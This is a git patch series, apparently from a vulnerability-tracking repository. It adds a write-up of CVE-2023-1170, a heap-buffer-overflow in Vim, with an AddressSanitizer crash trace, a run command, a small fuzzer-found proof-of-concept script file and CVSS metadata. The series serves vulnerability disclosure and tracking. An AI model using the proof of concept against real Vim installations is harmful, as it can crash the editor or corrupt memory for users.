From e76cdf0d4c8c1ccbc644f0172f256e1661781e44 Mon Sep 17 00:00:00 2001
From: s0uthwood <huruinan0427@outlook.com>
Date: Sun, 2 Apr 2023 13:22:47 +0800
Subject: [PATCH 1/2] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-1170?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/vim/2023/CVE-2023-1170/README.md    | 100 ++++++++++++++++++++++++
 cve/vim/2023/CVE-2023-1170/poc8_hbo.dat |   5 ++
 cve/vim/2023/yaml/CVE-2023-1170.yaml    |  19 +++++
 3 files changed, 124 insertions(+)
 create mode 100644 cve/vim/2023/CVE-2023-1170/README.md
 create mode 100644 cve/vim/2023/CVE-2023-1170/poc8_hbo.dat
 create mode 100644 cve/vim/2023/yaml/CVE-2023-1170.yaml

diff --git a/cve/vim/2023/CVE-2023-1170/README.md b/cve/vim/2023/CVE-2023-1170/README.md
new file mode 100644
index 00000000..63eceebc
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-1170/README.md
@@ -0,0 +1,100 @@
+## Description
+
+Heap-buffer-overflow in utf_ptr2char at mbyte.c:1825.
+
+## vim version
+
+```bash
+git log
+commit f0300fc7b81e63c2584dc3a763dedea4184d17e5 (grafted, HEAD -> master, tag: v9.0.1365, origin/master, origin/HEAD)
+```
+
+## Proof of Concept
+
+```bash
+./vim -u NONE -i NONE -n -m -X -Z -e -s -S poc8_hbo.dat -c :qa
+=================================================================
+==28015==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000008900 at pc 0x55bde0d0e239 bp 0x7fff1bc7f540 sp 0x7fff1bc7f530
+READ of size 1 at 0x621000008900 thread T0
+    #0 0x55bde0d0e238 in utf_ptr2char /home/fuzz/vim/src/mbyte.c:1825
+    #1 0x55bde0d410af in gchar_cursor /home/fuzz/vim/src/misc1.c:550
+    #2 0x55bde0dbe950 in adjust_cursor_eol /home/fuzz/vim/src/ops.c:1873
+    #3 0x55bde0ed97e7 in do_put /home/fuzz/vim/src/register.c:2301
+    #4 0x55bde0db035d in nv_put_opt /home/fuzz/vim/src/normal.c:7378
+    #5 0x55bde0daf772 in nv_put /home/fuzz/vim/src/normal.c:7255
+    #6 0x55bde0d866e1 in normal_cmd /home/fuzz/vim/src/normal.c:939
+    #7 0x55bde0bff4d3 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8887
+    #8 0x55bde0bff292 in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8850
+    #9 0x55bde0bfeb36 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8768
+    #10 0x55bde0bdad87 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
+    #11 0x55bde0bd1ef2 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
+    #12 0x55bde0f01d65 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1759
+    #13 0x55bde0f02fe0 in do_source /home/fuzz/vim/src/scriptfile.c:1905
+    #14 0x55bde0effa08 in cmd_source /home/fuzz/vim/src/scriptfile.c:1250
+    #15 0x55bde0effa6d in ex_source /home/fuzz/vim/src/scriptfile.c:1276
+    #16 0x55bde0bdad87 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2580
+    #17 0x55bde0bd1ef2 in do_cmdline /home/fuzz/vim/src/ex_docmd.c:993
+    #18 0x55bde0bd028c in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:587
+    #19 0x55bde12037ab in exe_commands /home/fuzz/vim/src/main.c:3146
+    #20 0x55bde11fc8ea in vim_main2 /home/fuzz/vim/src/main.c:782
+    #21 0x55bde11fc19c in main /home/fuzz/vim/src/main.c:433
+    #22 0x7fcb6ae03082 in __libc_start_main ../csu/libc-start.c:308
+    #23 0x55bde0a44e4d in _start (/home/fuzz/vim/src/vim+0x142e4d)
+
+0x621000008900 is located 0 bytes to the right of 4096-byte region [0x621000007900,0x621000008900)
+allocated by thread T0 here:
+    #0 0x7fcb6b29a808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
+    #1 0x55bde0a4528a in lalloc /home/fuzz/vim/src/alloc.c:246
+    #2 0x55bde0a4507b in alloc /home/fuzz/vim/src/alloc.c:151
+    #3 0x55bde1207c37 in mf_alloc_bhdr /home/fuzz/vim/src/memfile.c:885
+    #4 0x55bde1205f48 in mf_new /home/fuzz/vim/src/memfile.c:375
+    #5 0x55bde0d2bba8 in ml_new_data /home/fuzz/vim/src/memline.c:4138
+    #6 0x55bde0d19983 in ml_open /home/fuzz/vim/src/memline.c:391
+    #7 0x55bde0a618ea in open_buffer /home/fuzz/vim/src/buffer.c:192
+    #8 0x55bde1202add in create_windows /home/fuzz/vim/src/main.c:2915
+    #9 0x55bde11fc6ac in vim_main2 /home/fuzz/vim/src/main.c:713
+    #10 0x55bde11fc19c in main /home/fuzz/vim/src/main.c:433
+    #11 0x7fcb6ae03082 in __libc_start_main ../csu/libc-start.c:308
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow /home/fuzz/vim/src/mbyte.c:1825 in utf_ptr2char
+Shadow bytes around the buggy address:
+  0x0c427fff90d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fff90e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fff90f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fff9100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fff9110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c427fff9120:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fff9130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fff9140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fff9150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fff9160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fff9170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+  Shadow gap:              cc
+==28015==ABORTING
+```
+
+poc:
+[poc8_hbo.dat](poc8_hbo.dat)
+
+## Impact
+
+This vulnerability is capable of crashing software, modify memory, and possible remote execution.
diff --git a/cve/vim/2023/CVE-2023-1170/poc8_hbo.dat b/cve/vim/2023/CVE-2023-1170/poc8_hbo.dat
new file mode 100644
index 00000000..22443b29
--- /dev/null
+++ b/cve/vim/2023/CVE-2023-1170/poc8_hbo.dat
@@ -0,0 +1,5 @@
+norm0RV
+sil0normc	€ý0
+no0 v
+se ve=all
+sil0norm0z=p
\ No newline at end of file
diff --git a/cve/vim/2023/yaml/CVE-2023-1170.yaml b/cve/vim/2023/yaml/CVE-2023-1170.yaml
new file mode 100644
index 00000000..b8884618
--- /dev/null
+++ b/cve/vim/2023/yaml/CVE-2023-1170.yaml
@@ -0,0 +1,19 @@
+id: CVE-2023-1170
+source: https://huntr.dev/bounties/286e0090-e654-46d2-ac60-29f81799d0a4/
+info:
+  name: Vimæ˜¯ä¸€æ¬¾åŸºäºŽUNIXå¹³å°çš„ç¼–è¾‘å™¨ã€‚
+  severity: medium
+  description: |
+    Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1376.
+  scope-of-influence:
+    vim < 9.0.1376
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-1170
+  classification:
+    cvss-metrics:  CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H
+    cvss-score: 6.6
+    cve-id: CVE-2023-1170
+    cwe-id: CWE-122
+    cnvd-id: None
+    kve-id: None
+  tags: cve2023, å †ç¼“å†²åŒºæº¢å‡º
-- 
Gitee


From 55713c7d367c3319b5bfe323369c05586c9d9a65 Mon Sep 17 00:00:00 2001
From: s0uthwood <huruinan0427@outlook.com>
Date: Sun, 2 Apr 2023 13:29:01 +0800
Subject: [PATCH 2/2] Update openkylin_list.yaml

---
 openkylin_list.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 2b5c3a4e..c8ccdbe5 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -120,6 +120,7 @@ cve:
     - CVE-2023-0288
     - CVE-2023-0512
     - CVE-2023-1127
+    - CVE-2023-1170
     - CVE-2023-1175
     - CVE-2023-1264
   openssl:
-- 
Gitee